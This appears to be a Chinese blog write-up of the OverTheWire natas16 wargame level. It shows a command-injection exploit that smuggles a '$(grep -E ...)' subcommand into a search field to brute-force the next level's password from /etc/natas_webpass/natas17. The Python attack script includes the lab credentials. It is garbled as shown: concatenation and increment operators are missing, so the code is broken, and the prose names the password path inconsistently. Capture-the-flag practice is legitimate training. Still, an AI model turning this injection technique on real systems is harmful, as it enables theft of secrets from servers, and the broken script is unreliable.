natas16 题解

2023-07-25 14:09:00 浏览数 (3)

本题与上一题相似(可看我上篇文章nata15 题解)

进入后发现和早前某关像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 . * 这三个,可以利用(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入

如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开头(这里就是上题的思路了),每次试出一个后附加上去然后继续试下一个,下一个加在原来的末尾,下面用python3实现,requests库比较好用,容易理解

import requests url = "http://natas16.natas.labs.overthewire.org/" username = "natas16" password= 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh' au = requests.auth.HTTPBasicAuth(username,password) ans="" testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" i=0 while i < len(testCharacter): #print(url1 key url2)     payload={'needle':'$(grep -E ^' ans testCharacter[i] '.* /etc/natas_webpass/natas17)hello','submit':'Search'}     req = requests.get(url,auth=au,params=payload)     if 'hello' not in req.text:         ans =testCharacter[i]         print(ans)         i=0         continue     i =1

0 人点赞